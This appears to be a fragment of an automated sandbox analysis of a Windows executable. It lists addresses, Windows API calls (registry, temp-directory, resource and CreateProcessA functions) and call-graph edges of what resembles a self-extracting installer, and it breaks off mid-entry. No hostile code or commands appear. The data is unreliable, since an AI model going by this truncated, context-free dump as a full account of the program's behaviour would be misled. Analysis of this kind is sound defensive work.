2526 f827db 2525->2526 2525->2527 2528 f828a8 GetWindowsDirectoryA 2526->2528 2529 f827e3 2526->2529 2530 f828bf 2527->2530 2528->2530 2535 f8658a CharPrevA 2529->2535 2531 f828d2 2530->2531 2532 f8658a CharPrevA 2530->2532 2533 f86ce0 4 API calls 2531->2533 2532->2531 2534 f828e2 2533->2534 2534->2521 2536 f82810 RegOpenKeyExA 2535->2536 2536->2530 2537 f82837 RegQueryValueExA 2536->2537 2538 f8289a RegCloseKey 2537->2538 2539 f8285c 2537->2539 2538->2530 2540 f8287a 2539->2540 2541 f82867 ExpandEnvironmentStringsA 2539->2541 2540->2538 2541->2540 2543 f81890 2542->2543 2544 f81826 GetProcAddress 2542->2544 2547 f86ce0 4 API calls 2543->2547 2545 f81889 FreeLibrary 2544->2545 2546 f81839 AllocateAndInitializeSid 2544->2546 2545->2543 2546->2545 2549 f8185f FreeSid 2546->2549 2548 f8189f 2547->2548 2548->2443 2548->2449 2549->2545 2552 f8468f 7 API calls 2551->2552 2553 f851f9 LocalAlloc 2552->2553 2554 f8522d 2553->2554 2555 f8520d 2553->2555 2557 f8468f 7 API calls 2554->2557 2556 f844b9 20 API calls 2555->2556 2558 f8521e 2556->2558 2559 f8523a 2557->2559 2560 f86285 GetLastError 2558->2560 2561 f8523e 2559->2561 2562 f85262 lstrcmpA 2559->2562 2570 f85223 2560->2570 2563 f844b9 20 API calls 2561->2563 2564 f8527e 2562->2564 2565 f85272 LocalFree 2562->2565 2567 f8524f LocalFree 2563->2567 2568 f844b9 20 API calls 2564->2568 2566 f82f4d 2565->2566 2566->2277 2566->2280 2566->2312 2567->2566 2569 f85290 LocalFree 2568->2569 2569->2570 2570->2566 2572 f8468f 7 API calls 2571->2572 2573 f85175 2572->2573 2574 f8517a 2573->2574 2575 f851af 2573->2575 2577 f844b9 20 API calls 2574->2577 2576 f8468f 7 API calls 2575->2576 2579 f851c0 2576->2579 2578 f8518d 2577->2578 2578->2282 2738 f86298 2579->2738 2583 f851ce 2585 f844b9 20 API calls 2583->2585 2584 f851e1 2584->2282 2585->2578 2587 f8468f 7 API calls 2586->2587 2588 f855c7 LocalAlloc 2587->2588 2589 f855db 2588->2589 2590 f855fd 2588->2590 2592 f844b9 20 API calls 2589->2592 2591 f8468f 7 API calls 2590->2591 2593 f8560a 2591->2593 2594 f855ec 2592->2594 2595 f8560e 2593->2595 2596 f85632 lstrcmpA 2593->2596 2597 f86285 GetLastError 2594->2597 2598 f844b9 20 API calls 2595->2598 2599 f8564b LocalFree 2596->2599 2600 f85645 2596->2600 2601 f855f1 2597->2601 2602 f8561f LocalFree 2598->2602 2603 f8565b 2599->2603 2604 f85696 2599->2604 2600->2599 2624 f855f6 2601->2624 2602->2624 2612 f85467 49 API calls 2603->2612 2605 f8589f 2604->2605 2607 f856ae GetTempPathA 2604->2607 2608 f86517 24 API calls 2605->2608 2606 f86ce0 4 API calls 2609 f82f7e 2606->2609 2610 f856eb 2607->2610 2611 f856c3 2607->2611 2608->2624 2609->2289 2609->2312 2618 f8586c GetWindowsDirectoryA 2610->2618 2619 f85717 GetDriveTypeA 2610->2619 2610->2624 2750 f85467 2611->2750 2614 f85678 2612->2614 2616 f85680 2614->2616 2614->2624 2617 f844b9 20 API calls 2616->2617 2617->2601 2784 f8597d GetCurrentDirectoryA SetCurrentDirectoryA 2618->2784 2620 f85730 GetFileAttributesA 2619->2620 2629 f8572b 2619->2629 2620->2629 2624->2606 2625 f8597d 34 API calls 2625->2629 2626 f85467 49 API calls 2626->2610 2627 f82630 21 API calls 2627->2629 2629->2618 2629->2619 2629->2620 2629->2624 2629->2625 2629->2627 2630 f857c1 GetWindowsDirectoryA 2629->2630 2631 f8658a CharPrevA 2629->2631 2634 f85827 SetFileAttributesA 2629->2634 2635 f85467 49 API calls 2629->2635 2780 f86952 2629->2780 2630->2629 2632 f857e8 GetFileAttributesA 2631->2632 2632->2629 2633 f857fa CreateDirectoryA 2632->2633 2633->2629 2634->2629 2635->2629 2637 f86268 2636->2637 2638 f86249 2636->2638 2640 f8597d 34 API calls 2637->2640 2639 f844b9 20 API calls 2638->2639 2641 f8625a 2639->2641 2642 f86277 2640->2642 2643 f86285 GetLastError 2641->2643 2644 f86ce0 4 API calls 2642->2644 2645 f8625f 2643->2645 2646 f83013 2644->2646 2645->2642 2646->2296 2646->2312 2648 f83b2d 2647->2648 2648->2648 2649 f83b72 2648->2649 2650 f83b53 2648->2650 2851 f84fe0 2649->2851 2652 f86517 24 API calls 2650->2652 2653 f83b70 2652->2653 2654 f86298 10 API calls 2653->2654 2655 f83b7b 2653->2655 2654->2655 2655->2300 2657 f82622 2656->2657 2658 f82583 2656->2658 2905 f824e0 GetWindowsDirectoryA 2657->2905 2659 f825e8 RegOpenKeyExA 2658->2659 2660 f8258b 2658->2660 2662 f825e3 2659->2662 2663 f82609 RegQueryInfoKeyA 2659->2663 2660->2662 2664 f8259b RegOpenKeyExA 2660->2664 2662->2305 2665 f825d1 RegCloseKey 2663->2665 2664->2662 2666 f825bc RegQueryValueExA 2664->2666 2665->2662 2666->2665 2668 f83bdb 2667->2668 2683 f83bec 2667->2683 2669 f8468f 7 API calls 2668->2669 2669->2683 2670 f83c03 memset 2670->2683 2671 f83d13 2672 f844b9 20 API calls 2671->2672 2673 f83d26 2672->2673 2675 f83f4d 2673->2675 2676 f86ce0 4 API calls 2675->2676 2679 f83f60 2676->2679 2677 f83fd7 2677->2675 3003 f82267 2677->3003 2678 f83d7b CompareStringA 2678->2677 2678->2683 2679->2316 2681 f83fab 2684 f844b9 20 API calls 2681->2684 2683->2670 2683->2671 2683->2675 2683->2677 2683->2678 2683->2681 2685 f83f1e LocalFree 2683->2685 2686 f83f46 LocalFree 2683->2686 2690 f8468f 7 API calls 2683->2690 2691 f83cc7 CompareStringA 2683->2691 2701 f83e10 2683->2701 2913 f81ae8 2683->2913 2953 f8202a memset memset RegCreateKeyExA 2683->2953 2979 f83fef 2683->2979 2688 f83fbe LocalFree 2684->2688 2685->2677 2685->2683 2686->2675 2688->2675 2690->2683 2691->2683 2692 f83e1f GetProcAddress 2694 f83f64 2692->2694 2692->2701 2693 f83f92 2695 f844b9 20 API calls 2693->2695 2696 f844b9 20 API calls 2694->2696 2697 f83fa9 2695->2697 2698 f83f75 FreeLibrary 2696->2698 2699 f83f7c LocalFree 2697->2699 2698->2699 2700 f86285 GetLastError 2699->2700 2700->2673 2701->2692 2701->2693 2702 f83eff FreeLibrary 2701->2702 2703 f83f40 FreeLibrary 2701->2703 2993 f86495 2701->2993 2702->2685 2703->2686 2705 f8468f 7 API calls 2704->2705 2706 f83a55 LocalAlloc 2705->2706 2707 f83a6c 2706->2707 2708 f83a8e 2706->2708 2710 f844b9 20 API calls 2707->2710 2709 f8468f 7 API calls 2708->2709 2712 f83a98 2709->2712 2711 f83a7d 2710->2711 2713 f86285 GetLastError 2711->2713 2714 f83a9c 2712->2714 2715 f83ac5 lstrcmpA 2712->2715 2722 f82f64 2713->2722 2716 f844b9 20 API calls 2714->2716 2717 f83ada 2715->2717 2718 f83b0d LocalFree 2715->2718 2719 f83aad LocalFree 2716->2719 2720 f86517 24 API calls 2717->2720 2718->2722 2719->2722 2721 f83aec LocalFree 2720->2721 2721->2722 2722->2277 2722->2312 2724 f8303c 2723->2724 2724->2312 2726 f8468f 7 API calls 2725->2726 2727 f8417d LocalAlloc 2726->2727 2728 f841a8 2727->2728 2729 f84195 2727->2729 2731 f8468f 7 API calls 2728->2731 2730 f844b9 20 API calls 2729->2730 2732 f841a6 2730->2732 2733 f841b5 2731->2733 2732->2312 2734 f841b9 2733->2734 2735 f841c5 lstrcmpA 2733->2735 2737 f844b9 20 API calls 2734->2737 2735->2734 2736 f841e6 LocalFree 2735->2736 2736->2732 2737->2736 2739 f8171e _vsnprintf 2738->2739 2740 f862c9 FindResourceA 2739->2740 2742 f862cb LoadResource LockResource 2740->2742 2743 f86353 2740->2743 2742->2743 2746 f862e0 2742->2746 2744 f86ce0 4 API calls 2743->2744 2745 f851ca 2744->2745 2745->2583 2745->2584 2747 f8631b FreeResource 2746->2747 2748 f86355 FreeResource 2746->2748 2749 f8171e _vsnprintf 2747->2749 2748->2743 2749->2740 2751 f8548a 2750->2751 2768 f8551a 2750->2768 2811 f853a1 2751->2811 2753 f85581 2757 f86ce0 4 API calls 2753->2757 2756 f85495 2756->2753 2760 f8550c 2756->2760 2761 f854c2 GetSystemInfo 2756->2761 2762 f8559a 2757->2762 2758 f8553b CreateDirectoryA 2763 f85577 2758->2763 2764 f85547 2758->2764 2759 f8554d 2759->2753 2765 f8597d 34 API calls 2759->2765 2766 f8658a CharPrevA 2760->2766 2772 f854da 2761->2772 2762->2624 2774 f82630 GetWindowsDirectoryA 2762->2774 2767 f86285 GetLastError 2763->2767 2764->2759 2770 f8555c 2765->2770 2766->2768 2769 f8557c 2767->2769 2822 f858c8 2768->2822 2769->2753 2770->2753 2773 f85568 RemoveDirectoryA 2770->2773 2771 f8658a CharPrevA 2771->2760 2772->2760 2772->2771 2773->2753 2775 f8265e 2774->2775 2776 f8266f 2774->2776 2778 f844b9 20 API calls 2775->2778 2777 f86ce0 4 API calls 2776->2777 2779 f82687 2777->2779 2778->2776 2779->2610 2779->2626 2781 f8696e GetDiskFreeSpaceA 2780->2781 2782 f869a1 2780->2782 2781->2782 2783 f86989 MulDiv 2781->2783 2782->2629 2783->2782 2785 f859bb 2784->2785 2786 f859dd GetDiskFreeSpaceA 2784->2786 2787 f844b9 20 API calls 2785->2787 2788 f85ba1 memset 2786->2788 2789 f85a21 MulDiv 2786->2789 2790 f859cc 2787->2790 2791 f86285 GetLastError 2788->2791 2789->2788 2792 f85a50 GetVolumeInformationA 2789->2792 2793 f86285 GetLastError 2790->2793 2794 f85bbc GetLastError FormatMessageA 2791->2794 2795 f85a6e memset 2792->2795 2796 f85ab5 SetCurrentDirectoryA 2792->2796 2798 f859d1 2793->2798 2799 f85be3 2794->2799 2800 f86285 GetLastError 2795->2800 2797 f85acc 2796->2797 2806 f85b0a 2797->2806 2808 f85b20 2797->2808 2809 f85b94 2798->2809 2801 f844b9 20 API calls 2799->2801 2802 f85a89 GetLastError FormatMessageA 2800->2802 2804 f85bf5 SetCurrentDirectoryA 2801->2804 2802->2799 2803 f86ce0 4 API calls 2805 f85c11 2803->2805 2804->2809 2805->2610 2807 f844b9 20 API calls 2806->2807 2807->2798 2808->2809 2834 f8268b 2808->2834 2809->2803 2813 f853bf 2811->2813 2812 f8171e _vsnprintf 2812->2813 2813->2812 2814 f8658a CharPrevA 2813->2814 2818 f85415 GetTempFileNameA 2813->2818 2815 f853fa RemoveDirectoryA GetFileAttributesA 2814->2815 2815->2813 2816 f8544f CreateDirectoryA 2815->2816 2817 f8543a 2816->2817 2816->2818 2820 f86ce0 4 API calls 2817->2820 2818->2817 2819 f85429 DeleteFileA CreateDirectoryA 2818->2819 2819->2817 2821 f85449 2820->2821 2821->2756 2823 f858d8 2822->2823 2823->2823 2824 f858df LocalAlloc 2823->2824 2825 f85919 2824->2825 2826 f858f3 2824->2826 2829 f8658a CharPrevA 2825->2829 2827 f844b9 20 API calls 2826->2827 2833 f85906 2827->2833 2828 f86285 GetLastError 2830 f85534 2828->2830 2831 f85931 CreateFileA LocalFree 2829->2831 2830->2758 2830->2759 2832 f8595b CloseHandle GetFileAttributesA 2831->2832 2831->2833 2832->2833 2833->2828 2833->2830 2835 f826b9 2834->2835 2836 f826e5 2834->2836 2837 f8171e _vsnprintf 2835->2837 2838 f826ea 2836->2838 2839 f8271f 2836->2839 2840 f826cc 2837->2840 2841 f8171e _vsnprintf 2838->2841 2842 f8171e _vsnprintf 2839->2842 2849 f826e3 2839->2849 2844 f844b9 20 API calls 2840->2844 2845 f826fd 2841->2845 2847 f82735 2842->2847 2843 f86ce0 4 API calls 2848 f8276d 2843->2848 2844->2849 2846 f844b9 20 API calls 2845->2846 2846->2849 2850 f844b9 20 API calls 2847->2850 2848->2809 2849->2843 2850->2849 2852 f8468f 7 API calls 2851->2852 2853 f84ff5 FindResourceA LoadResource LockResource 2852->2853 2854 f85020 2853->2854 2870 f8515f 2853->2870 2855 f85029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2854->2855 2856 f85057 2854->2856 2855->2856 2873 f84efd 2856->2873 2859 f85060 2860 f844b9 20 API calls 2859->2860 2867 f85075 2860->2867 2861 f850e8 2863 f844b9 20 API calls 2861->2863 2862 f85106 2864 f8511d 2862->2864 2865 f85110 FreeResource 2862->2865 2863->2867 2868 f8513a 2864->2868 2869 f85129 2864->2869 2865->2864 2866 f8507c 2866->2861 2866->2862 2867->2862 2868->2870 2872 f8514c SendMessageA 2868->2872 2871 f844b9 20 API calls 2869->2871 2870->2653 2871->2868 2872->2870 2874 f84f4a 2873->2874 2875 f84fa1 2874->2875 2881 f84980 2874->2881 2877 f86ce0 4 API calls 2875->2877 2878 f84fc6 2877->2878 2878->2859 2878->2866 2882 f84990 2881->2882 2883 f849c2 lstrcmpA 2882->2883 2884 f849a5 2882->2884 2886 f84a0e 2883->2886 2887 f849ba 2883->2887 2885 f844b9 20 API calls 2884->2885 2885->2887 2886->2887 2892 f8487a 2886->2892 2887->2875 2889 f84b60 2887->2889 2890 f84b92 FindCloseChangeNotification 2889->2890 2891 f84b76 2889->2891 2890->2891 2891->2875 2893 f848a2 CreateFileA 2892->2893 2895 f84908 2893->2895 2896 f848e9 2893->2896 2895->2887 2896->2895 2897 f848ee 2896->2897 2900 f8490c 2897->2900 2901 f84917 2900->2901 2902 f848f5 CreateFileA 2900->2902 2901->2902 2903 f84962 CharNextA 2901->2903 2904 f84953 CreateDirectoryA 2901->2904 2902->2895 2903->2901 2904->2903 2906 f8255b 2905->2906 2907 f82510 2905->2907 2909 f86ce0 4 API calls 2906->2909 2908 f8658a CharPrevA 2907->2908 2910 f82522 WritePrivateProfileStringA _lopen 2908->2910 2911 f82569 2909->2911 2910->2906 2912 f82548 _llseek _lclose 2910->2912 2911->2662 2912->2906 2914 f81b25 2913->2914 3017 f81a84 2914->3017 2916 f81b57 2917 f8658a CharPrevA 2916->2917 2918 f81b8c 2916->2918 2917->2918 2919 f866c8 2 API calls 2918->2919 2920 f81bd1 2919->2920 2921 f81bd9 CompareStringA 2920->2921 2922 f81d73 2920->2922 2921->2922 2923 f81bf7 GetFileAttributesA 2921->2923 2924 f866c8 2 API calls 2922->2924 2928 f81d53 2923->2928 2929 f81c0d 2923->2929 2925 f81d7d 2924->2925 2926 f81df8 LocalAlloc 2925->2926 2927 f81d81 CompareStringA 2925->2927 2926->2928 2931 f81e0b GetFileAttributesA 2926->2931 2927->2926 2936 f81d9b 2927->2936 2932 f844b9 20 API calls 2928->2932 2929->2928 2930 f81a84 2 API calls 2929->2930 2933 f81c31 2930->2933 2944 f81e1d 2931->2944 2951 f81e45 2931->2951 2950 f81cc2 2932->2950 2934 f81c50 LocalAlloc 2933->2934 2939 f81a84 2 API calls 2933->2939 2934->2928 2937 f81c67 GetPrivateProfileIntA GetPrivateProfileStringA 2934->2937 2935 f81e89 2938 f86ce0 4 API calls 2935->2938 2936->2936 2940 f81dbe LocalAlloc 2936->2940 2946 f81cf8 2937->2946 2937->2950 2943 f81ea1 2938->2943 2939->2934 2940->2928 2945 f81de1 2940->2945 2943->2683 2944->2951 2949 f8171e _vsnprintf 2945->2949 2947 f81d09 GetShortPathNameA 2946->2947 2948 f81d23 2946->2948 2947->2948 2952 f8171e _vsnprintf 2948->2952 2949->2950 2950->2935 3023 f82aac 2951->3023 2952->2950 2954 f8209a 2953->2954 2955 f82256 2953->2955 2957 f8171e _vsnprintf 2954->2957 2960 f820dc 2954->2960 2956 f86ce0 4 API calls 2955->2956 2958 f82263 2956->2958 2959 f820af RegQueryValueExA 2957->2959 2958->2683 2959->2954 2959->2960 2961 f820fb GetSystemDirectoryA 2960->2961 2962 f820e4 RegCloseKey 2960->2962 2963 f8658a CharPrevA 2961->2963 2962->2955 2964 f8211b LoadLibraryA 2963->2964 2965 f82179 GetModuleFileNameA 2964->2965 2966 f8212e GetProcAddress FreeLibrary 2964->2966 2968 f821de RegCloseKey 2965->2968 2969 f82177 LocalAlloc 2965->2969 2966->2965 2967 f8214e GetSystemDirectoryA 2966->2967 2967->2969 2970 f82165 2967->2970 2968->2955 2973 f821ec 2969->2973 2974 f821cd 2969->2974 2971 f8658a CharPrevA 2970->2971 2971->2969 2976 f8171e _vsnprintf 2973->2976 2975 f844b9 20 API calls 2974->2975 2975->2968 2977 f82218 RegSetValueExA RegCloseKey LocalFree 2976->2977 2977->2955 2980 f84106 2979->2980 2981 f84016 CreateProcessA 2979->2981 2982 f86ce0 4 API calls 2980->2982 2983 f84041 WaitForSingleObject GetExitCodeProcess 2981->2983 2984 f840c4 2981->2984 2985 f84117 2982->2985 2989 f84070 2983->2989 2986 f86285 GetLastError 2984->2986 2985->2683 2988 f840c9 GetLastError FormatMessageA 2986->2988 2991 f844b9 20 API calls 2988->2991 3050 f8411b 2989->3050 2990 f84096 CloseHandle CloseHandle 2990->2980 2992 f840ba 2990->2992 2991->2980 2992->2980 2994 f864c2 2993->2994 2995 f8658a CharPrevA 2994->2995 2996 f864d8 GetFileAttributesA 2995->2996 2997 f864ea 2996->2997 2998 f86501 LoadLibraryA 2996->2998 2997->2998 2999 f864ee LoadLibraryExA 2997->2999 3000 f86508 2998->3000 2999->3000 3001 f86ce0 4 API calls 3000->3001 3002 f86513 3001->3002 3002->2701 3004 f82289 RegOpenKeyExA 3003->3004 3005 f82381 3003->3005 3004->3005 3007 f822b1 RegQueryValueExA 3004->3007 3006 f86ce0 4 API calls 3005->3006 3008 f8238c 3006->3008 3009 f82374 RegCloseKey 3007->3009 3010 f822e6 memset GetSystemDirectoryA 3007->3010 3008->2675 3009->3005 3011 f8230f 3010->3011 3012 f82321 3010->3012 3013 f8658a CharPrevA 3011->3013 3014 f8171e _vsnprintf 3012->3014 3013->3012 3015 f8233f 3014->3015 3015->3015 3016 f82353 RegSetValueExA 3015->3016 3016->3009 3018 f81a9a 3017->3018 3020 f81aba 3018->3020 3022 f81aaf 3018->3022 3036 f8667f 3018->3036 3020->2916 3021 f8667f 2 API calls 3021->3022 3022->3020 3022->3021 3024 f82be6 3023->3024 3025 f82ad4 GetModuleFileNameA 3023->3025 3026 f86ce0 4 API calls 3024->3026 3035 f82b02 3025->3035 3028 f82bf5 3026->3028 3027 f82af1 IsDBCSLeadByte 3027->3035 3028->2935 3029 f82bca CharNextA 3032 f82bd3 CharNextA 3029->3032 3030 f82b11 CharNextA CharUpperA 3031 f82b8d CharUpperA 3030->3031 3030->3035 3031->3035 3032->3035 3034 f82b43 CharPrevA 3034->3035 3035->3024 3035->3027 3035->3029 3035->3030 3035->3032 3035->3034 3041 f865e8 3035->3041 3037 f86689 3036->3037 3038 f866a5 3037->3038 3039 f86648 IsDBCSLeadByte 3037->3039 3040 f86697 CharNextA 3037->3040 3038->3018 3039->3037 3040->3037 3042 f865f4 3041->3042 3042->3042 3043 f865fb CharPrevA 3042->3043 3044 f86611 CharPrevA 3043->3044 3045 f8661e 3044->3045 3046 f8660b 3044->3046 3047 f8663d 3045->3047 3048 f86634 CharNextA 3045->3048 3049 f86627 CharPrevA 3045->3049 3046->3044 3046->3045 3047->3035 3048->3047 3049->3047 3049->3048 3051 f84132 3050->3051 3053 f8412a 3050->3053 3054 f81ea7 3051->3054 3053->2990 3055 f81ed3 3054->3055 3056 f81eba 3054->3056 3055->3053 3057 f8256d 15 API calls 3056->3057 3057->3055 3059 f81ff0 RegOpenKeyExA 3058->3059 3060 f82026 3058->3060 3059->3060 3061 f8200f RegDeleteValueA RegCloseKey 3059->3061 3060->2320 3061->3060 3062 f84ca0 GlobalAlloc 3173 f819e0 3174 f81a03 3173->3174 3175 f81a24 GetDesktopWindow 3173->3175 3177 f81a20 3174->3177 3178 f81a16 EndDialog 3174->3178 3176 f843d0 11 API calls 3175->3176 3179 f81a33 LoadStringA SetDlgItemTextA MessageBeep 3176->3179 3180 f86ce0 4 API calls 3177->3180 3178->3177 3179->3177 3181 f81a7e 3180->3181 3182 f86a20 __getmainargs 3063 f84cd0 3064 f84d0b 3063->3064 3065 f84cf4 3063->3065 3066 f84d02 3064->3066 3069 f84dcb 3064->3069 3072 f84d25 3064->3072 3065->3066 3067 f84b60 FindCloseChangeNotification 3065->3067 3068 f86ce0 4 API calls 3066->3068 3067->3066 3070 f84e95 3068->3070 3071 f84dd4 SetDlgItemTextA 3069->3071 3073 f84de3 3069->3073 3071->3073 3072->3066 3086 f84c37 3072->3086 3073->3066 3091 f8476d 3073->3091 3077 f84e38 3077->3066 3079 f84980 25 API calls 3077->3079 3078 f84b60 FindCloseChangeNotification 3080 f84d99 SetFileAttributesA 3078->3080 3081 f84e56 3079->3081 3080->3066 3081->3066 3082 f84e64 3081->3082 3100 f847e0 LocalAlloc 3082->3100 3085 f84e6f 3085->3066 3087 f84c4c DosDateTimeToFileTime 3086->3087 3088 f84c88 3086->3088 3087->3088 3089 f84c5e LocalFileTimeToFileTime 3087->3089 3088->3066 3088->3078 3089->3088 3090 f84c70 SetFileTime 3089->3090 3090->3088 3109 f866ae GetFileAttributesA 3091->3109 3093 f8477b 3093->3077 3094 f847cc SetFileAttributesA 3096 f847db 3094->3096 3096->3077 3097 f86517 24 API calls 3098 f847b1 3097->3098 3098->3094 3098->3096 3099 f847c2 3098->3099 3099->3094 3101 f8480f LocalAlloc 3100->3101 3102 f847f6 3100->3102 3105 f84831 3101->3105 3108 f8480b 3101->3108 3103 f844b9 20 API calls 3102->3103 3103->3108 3106 f844b9 20 API calls 3105->3106 3107 f84846 LocalFree 3106->3107 3107->3108 3108->3085 3110 f84777 3109->3110 3110->3093 3110->3094 3110->3097 3111 f84ad0 3119 f83680 3111->3119 3114 f84ae9 3115 f84aee WriteFile 3116 f84b0f 3115->3116 3117 f84b14 3115->3117 3117->3116 3118 f84b3b SendDlgItemMessageA 3117->3118 3118->3116 3120 f83691 MsgWaitForMultipleObjects 3119->3120 3121 f836e8 3120->3121 3122 f836a9 PeekMessageA 3120->3122 3121->3114 3121->3115 3122->3120 3123 f836bc 3122->3123 3123->3120 3123->3121 3124 f836c7 DispatchMessageA 3123->3124 3125 f836d1 PeekMessageA 3123->3125 3124->3125 3125->3123 3183 f84a50 3184 f84a9f ReadFile 3183->3184 3185 f84a66 3183->3185 3186 f84abb 3184->3186 3185->3186 3187 f84a82 memcpy 3185->3187 3187->3186 3188 f83450 3189 f8345e 3188->3189 3190 f834d3 EndDialog 3188->3190 3191 f8349a GetDesktopWindow 3189->3191 3196 f83465 3189->3196 3192 f8346a 3190->3192 3193 f843d0 11 API calls 3191->3193 3194 f834ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3193->3194 3194->3192 3195 f8348c EndDialog 3195->3192 3196->3192 3196->3195 3197 f83210 3198 f83227 3197->3198 3223 f8328e EndDialog 3197->3223 3199 f833e2 GetDesktopWindow 3198->3199 3202 f83235 3198->3202 3201 f843d0 11 API calls 3199->3201 3203 f833f1 SetWindowTextA SendDlgItemMessageA 3201->3203 3204 f8324c 3202->3204 3205 f832dd GetDlgItemTextA 3202->3205 3215 f83239 3202->3215 3206 f8341f GetDlgItem EnableWindow 3203->3206 3203->3215 3208 f83251 3204->3208 3209 f832c5 EndDialog 3204->3209 3207 f83366 3205->3207 3216 f832fc 3205->3216 3206->3215 3211 f844b9 20 API calls 3207->3211 3210 f8325c LoadStringA 3208->3210 3208->3215 3209->3215 3212 f8327b 3210->3212 3213 f83294 3210->3213 3211->3215 3219 f844b9 20 API calls 3212->3219 3235 f84224 LoadLibraryA 3213->3235 3216->3207 3218 f83331 GetFileAttributesA 3216->3218 3221 f8337c 3218->3221 3222 f8333f 3218->3222 3219->3223 3220 f832a5 SetDlgItemTextA 3220->3212 3220->3215 3224 f8658a CharPrevA 3221->3224 3225 f844b9 20 API calls 3222->3225 3223->3215 3227 f8338d 3224->3227 3226 f83351 3225->3226 3226->3215 3228 f8335a CreateDirectoryA 3226->3228 3229 f858c8 27 API calls 3227->3229 3228->3207 3228->3221 3230 f83394 3229->3230 3230->3207 3231 f833a4 3230->3231 3232 f833c7 EndDialog 3231->3232 3233 f8597d 34 API calls 3231->3233 3232->3215 3234 f833c3 3233->3234 3234->3215 3234->3232 3236 f843b2 3235->3236 3237 f84246 GetProcAddress 3235->3237 3241 f844b9 20 API calls 3236->3241 3238 f8425d GetProcAddress 3237->3238 3239 f843a4 FreeLibrary 3237->3239 3238->3239 3240 f84274 GetProcAddress 3238->3240 3239->3236 3240->3239 3242 f8428b 3240->3242 3244 f8329d 3241->3244 3243 f84295 GetTempPathA 3242->3243 3249 f842e1 3242->3249 3245 f842ad 3243->3245 3244->3215 3244->3220 3245->3245 3246 f842b4 CharPrevA 3245->3246 3247 f842d0 CharPrevA 3246->3247 3246->3249 3247->3249 3248 f84390 FreeLibrary 3248->3244 3249->3248 3126 f84cc0 GlobalFree 3127 f86f40 SetUnhandledExceptionFilter 3250 f84bc0 3252 f84bd7 3250->3252 3253 f84c05 3250->3253 3251 f84c1b SetFilePointer 3251->3252 3253->3251 3253->3252 3254 f830c0 3255 f830de CallWindowProcA 3254->3255 3256 f830ce 3254->3256 3257 f830da 3255->3257 3256->3255 3256->3257 3258 f863c0 3259 f86407 3258->3259 3260 f8658a CharPrevA 3259->3260 3261 f86415 CreateFileA 3260->3261 3262 f86448 WriteFile 3261->3262 3263 f8643a 3261->3263 3264 f86465 CloseHandle 3262->3264 3266 f86ce0 4 API calls 3263->3266 3264->3263 3267 f8648f 3266->3267 3268 f83100 3269 f831b0 3268->3269 3270 f83111 3268->3270 3272 f831b9 SendDlgItemMessageA 3269->3272 3275 f83141 3269->3275 3271 f8311d 3270->3271 3273 f83149 GetDesktopWindow 3270->3273 3274 f83138 EndDialog 3271->3274 3271->3275 3272->3275 3276 f843d0 11 API calls 3273->3276 3274->3275 3277 f8315d 6 API calls 3276->3277 3277->3275 3278 f84200 3279 f8420b SendMessageA 3278->3279 3280 f8421e 3278->3280 3279->3280 3281 f86c03 3282 f86c1e 3281->3282 3283 f86c17 _exit 3281->3283 3284 f86c27 _cexit 3282->3284 3285 f86c32 3282->3285 3283->3282 3284->3285

                                                                      Callgraph

                                                                      • Executed
                                                                      • Not Executed
                                                                      • Opacity -> Relevance
                                                                      • Disassembly available
                                                                      callgraph 0 Function_00F866F9 1 Function_00F82BFB 39 Function_00F852B6 1->39 40 Function_00F82CAA 1->40 56 Function_00F81F90 1->56 105 Function_00F82F1D 1->105 2 Function_00F84EFD 19 Function_00F86CE0 2->19 64 Function_00F84980 2->64 80 Function_00F84B60 2->80 3 Function_00F870FE 4 Function_00F86EF0 5 Function_00F834F0 24 Function_00F843D0 5->24 35 Function_00F844B9 5->35 65 Function_00F83680 5->65 6 Function_00F86CF0 7 Function_00F81AE8 7->19 28 Function_00F866C8 7->28 7->35 38 Function_00F816B3 7->38 41 Function_00F82AAC 7->41 60 Function_00F8658A 7->60 63 Function_00F81680 7->63 67 Function_00F81781 7->67 68 Function_00F81A84 7->68 107 Function_00F8171E 7->107 8 Function_00F828E8 59 Function_00F82A89 8->59 75 Function_00F82773 8->75 9 Function_00F865E8 10 Function_00F870EB 11 Function_00F836EE 11->8 11->19 30 Function_00F867C9 11->30 11->35 11->59 108 Function_00F8681F 11->108 12 Function_00F817EE 12->19 13 Function_00F83FEF 13->19 13->35 69 Function_00F86285 13->69 104 Function_00F8411B 13->104 14 Function_00F871EF 15 Function_00F86BEF 16 Function_00F84FE0 16->2 16->35 62 Function_00F8468F 16->62 17 Function_00F847E0 17->35 17->63 18 Function_00F831E0 19->6 20 Function_00F824E0 20->19 20->60 21 Function_00F819E0 21->19 21->24 22 Function_00F81FE1 23 Function_00F851E5 23->35 23->62 23->69 24->19 25 Function_00F84CD0 25->17 25->19 53 Function_00F84E99 25->53 25->64 78 Function_00F8476D 25->78 25->80 97 Function_00F84C37 25->97 118 Function_00F84702 25->118 26 Function_00F84AD0 26->65 27 Function_00F858C8 27->35 27->60 27->63 27->69 91 Function_00F86648 28->91 29 Function_00F817C8 57 Function_00F86793 30->57 31 Function_00F84CC0 32 Function_00F84BC0 33 Function_00F830C0 34 Function_00F863C0 34->19 34->60 34->67 35->19 35->30 35->63 35->107 35->108 36 Function_00F86FBE 89 Function_00F86F54 36->89 37 Function_00F869B0 37->14 37->36 74 Function_00F86C70 37->74 117 Function_00F87000 37->117 38->67 39->9 39->19 39->22 55 Function_00F82390 39->55 39->67 40->11 40->19 40->35 49 Function_00F818A3 40->49 54 Function_00F85C9E 40->54 40->55 40->62 112 Function_00F86517 40->112 41->9 41->19 41->29 41->63 42 Function_00F866AE 43 Function_00F855A0 43->19 43->35 43->60 43->62 43->67 43->69 71 Function_00F8597D 43->71 84 Function_00F85467 43->84 88 Function_00F86952 43->88 96 Function_00F82630 43->96 43->112 44 Function_00F84CA0 45 Function_00F853A1 45->19 45->60 45->63 45->107 46 Function_00F86FA1 47 Function_00F83BA2 47->7 47->13 47->19 47->35 58 Function_00F86495 47->58 47->62 47->67 47->69 85 Function_00F82267 47->85 98 Function_00F8202A 47->98 48 Function_00F872A2 49->12 49->19 50 Function_00F86FA5 92 Function_00F8724D 50->92 51 Function_00F81EA7 77 Function_00F8256D 51->77 52 Function_00F86298 52->19 52->107 53->63 54->18 54->19 54->28 54->35 54->60 54->63 72 Function_00F8667F 54->72 99 Function_00F86E2A 54->99 111 Function_00F85C17 54->111 55->19 55->38 55->55 55->60 55->63 56->19 56->35 56->51 58->19 58->60 58->67 60->38 61 Function_00F8268B 61->19 61->35 61->107 63->67 64->35 70 Function_00F8487A 64->70 66 Function_00F86380 68->72 114 